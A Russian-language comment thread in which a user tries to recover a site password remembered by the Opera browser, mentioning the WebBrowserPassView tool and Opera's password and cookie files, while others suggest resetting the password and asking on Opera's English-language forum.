Её возможности: Просмотр паролей, хранящиеся в веб-браузере (поддерживает Internet Explorer, Firefox , Chrome , Safari и Opera )

Только на неё ругаются антивирусы, но она безобидна, проверено не раз. Пробуйте.

WebBrowserPassView нашла все пароли у всех браузеров. в опере нашла только пароль от самого браузера. и больше ничего.
насчет точек восстановления
отдельно смотрела wand.dat прошлой версий не обнаружено
Users\я\AppData\Roaming\Opera Software есть предыдущие версии но wand.dat там нет.есть login.data Cookies .они есть и в новой версии. непонятно как и что там именно расшифровывать. чтобы получить пароль?
пароль должен быть где то точно. потому на сайт я пока захожу. опера его помнит гдето

А сменить пароль нет возможности на том сайте, вы наверняка регились, может к определенной почте привязывали.
И еще раз спрошу; Ранее этот пароль хранился в «Управление сохраненными паролями» в «Опере»?

И как вы потеряли этот пароль, после чего или после каких действий?

в управлении сохранными паролями нет ничего. пусто вообще. если б можно было обычно через мейл восстановить. я бы не лазила по форумам.все что могла в инете найти уже перепробовала.вопрос был как достать пароли из куков. в опере.

да по этой теме куча видео.на ютубе. но все они для старых версий. и уже неактуальны . потому что новая опера гдето пароли прячет. хотя точно гдето хранит.потому что на сайт я все еще захожу пока

в управлении сохранными паролями нет ничего. пусто вообще.

Я понял что пусто, я спросил, А был ли ранее? пароль до того как вы его потеряли, в «Управление сохраненными паролями»

Вопрос теперь понятен.

Попробуйте еще задать такой вопрос на англоязычном форуме Opera, туда разработчики заглядывают чаще.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *